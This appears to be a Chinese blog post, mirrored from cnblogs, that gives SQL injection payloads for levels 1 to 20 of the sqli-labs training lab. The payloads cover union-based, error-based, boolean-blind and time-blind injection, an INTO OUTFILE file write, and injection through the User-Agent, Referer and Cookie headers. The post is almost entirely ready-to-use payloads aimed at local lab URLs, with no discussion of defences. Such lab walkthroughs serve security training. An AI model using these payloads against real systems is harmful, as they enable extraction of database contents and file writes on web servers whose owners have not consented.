zoukankan      html  css  js  c++  java
  • sqlilabs 1-20关 payload

    1、
    联合查询注入:
    爆库名:http://127.0.0.1/sqli/Less-1/?id=-1' union select 1,database(),3 --+
    爆表名:http://127.0.0.1/sqli/Less-1/?id=-1' union select 1,(select table_name from information_schema.tables where table_schema='security' limit 0,1),3 --+
    爆列名:http://127.0.0.1/sqli/Less-1/?id=-1' union select 1,(select column_name from information_schema.columns where table_schema='security' and table_name='emails' limit 0,1),3 --+
    爆数据:http://127.0.0.1/sqli/Less-1/?id=-1' union select 1,(select email_id from security.emails limit 1,1),3 --+

    2、
    同1
    http://127.0.0.1/sqli/Less-2/?id=-1 union select 1,user(),3

    3、
    同1
    http://127.0.0.1/sqli/Less-3/?id=-1') union select 1,user(),3 --+

    4、
    同1
    http://127.0.0.1/sqli/Less-3/?id=-1") union select 1,user(),3 --+

    5、
    报错注入:
    爆库名:http://127.0.0.1/sqli/Less-5/?id=1' and updatexml(1,concat(0x7e,(select database()),0x7e),1) --+
    爆表名:http://127.0.0.1/sqli/Less-5/?id=1' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security' limit 0,1),0x7e),1) --+
    爆列名:http://127.0.0.1/sqli/Less-5/?id=1' and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema='security' and table_name='emails' limit 0,1),0x7e),1) --+
    爆数据:http://127.0.0.1/sqli/Less-5/?id=1' and updatexml(1,concat(0x7e,(select id from security.emails limit 0,1),0x7e),1) --+

    布尔盲注:
    http://127.0.0.1/sqli/Less-5/?id=1' and left(version(),1)=5 --+
    http://127.0.0.1/sqli/Less-5/?id=1' and length(database())=8 --+
    爆库名:http://127.0.0.1/sqli/Less-5/?id=1' and left(database(),1)='s' --+ or http://127.0.0.1/sqli/Less-5/?id=1' and substr(database(),1,1)='s' --+ subsur从第一个字符开始每次只返回一个
    爆表名:http://127.0.0.1/sqli/Less-5/?id=1' and substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1)='e' --+
    爆列名:http://127.0.0.1/sqli/Less-5/?id=1' and substr((select column_name from information_schema.columns where table_schema='security' and table_name='emails' limit 0,1),1,1)='i' --+
    爆数据:http://127.0.0.1/sqli/Less-5/?id=1' and substr((select id from security.emails limit 0,1),1,1)='1' --+

    时间盲注:
    http://127.0.0.1/sqli/Less-5/?id=1' and if(length(database())>1,sleep(5),1) --+
    爆库名:http://127.0.0.1/sqli/Less-5/?id=1' and if(substr(database(),1,1)='s',sleep(5),1) --+
    爆表名:http://127.0.0.1/sqli/Less-5/?id=1' and if(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1)='e',sleep(5),1) --+
    爆列名:http://127.0.0.1/sqli/Less-5/?id=1' and if(substr((select column_name from information_schema.columns where table_schema='security' and table_name='emails' limit 0,1),1,1)='i',sleep(5),1) --+
    爆数据:http://127.0.0.1/sqli/Less-5/?id=1' and if(substr((select id from security.emails limit 0,1),1,1)=1,sleep(5),1) --+


    6、
    同5
    http://127.0.0.1/sqli/Less-6/?id=1" and updatexml(1,concat(0x7e,(select database()),0x7e),1) --+
    http://127.0.0.1/sqli/Less-5/?id=1' and left(version(),1)=5 --+

    7、
    http://192.168.43.83/sqli/Less-7/?id=-1')) UNION SELECT 1,2,3 into outfile "C:\phpStudy\PHPTutorial\WWW\sqli\Less-7\1.txt"#

    8、
    同5 布尔或时间盲注(无错误回显,所以无法报错注入)
    http://127.0.0.1/sqli/Less-8/?id=1' and length(database())>5 --+

    9、
    同5 时间盲注

    10、
    同5 双引号闭合 时间盲注
    http://127.0.0.1/sqli/Less-10/?id=1" and if(substr(database(),1,1)='s',sleep(5),1) --+

    11、
    POST注入 (万能密码)
    联合查询注入/报错注入/盲注??
    admin' order by 3 #
    1' union select user(),database() #


    12、
    1") union select user(),database() #

    13、
    报错注入
    1') and updatexml(1,concat(0x7e,database(),0x7e),1) #

    14、
    双引号闭合
    1" and updatexml(1,concat(0x7e,database(),0x7e),1) #

    15、
    布尔盲注
    admin' and length(database())>1 #


    16、
    时间盲注
    admin") and if(ascii(substr(database(),1,1))>1,sleep(5),1) #

    17、
    报错注入
    username:admin
    password:1' and updatexml(1,concat(0x7e,database(),0x7e),1) #

    18、
    User-Agent: 1' and updatexml(1,concat(0x7e,database(),0x7e),1) and '1'='1

    19、
    Referer: 1' and updatexml(1,concat(0x7e,database(),0x7e),1) and '1'='1


    20、
    Cookie: uname=admin' and updatexml(1,concat(0x7e,database(),0x7e),1) #

  • 相关阅读:
    $router和$route的区别
    提莫攻击
    paste命令
    数组中的第K个最大元素
    od命令
    被围绕的区域
    不用虚机不用Docker使用Azure应用服务部署ASP.NET Core程序
    面试官:对象可能会迟到,但它永远不会缺席
    Kubernetes 的层级命名空间介绍
    每日一道 LeetCode (21):对称二叉树
  • 原文地址:https://www.cnblogs.com/shisana/p/13272834.html
Copyright © 2011-2022 走看看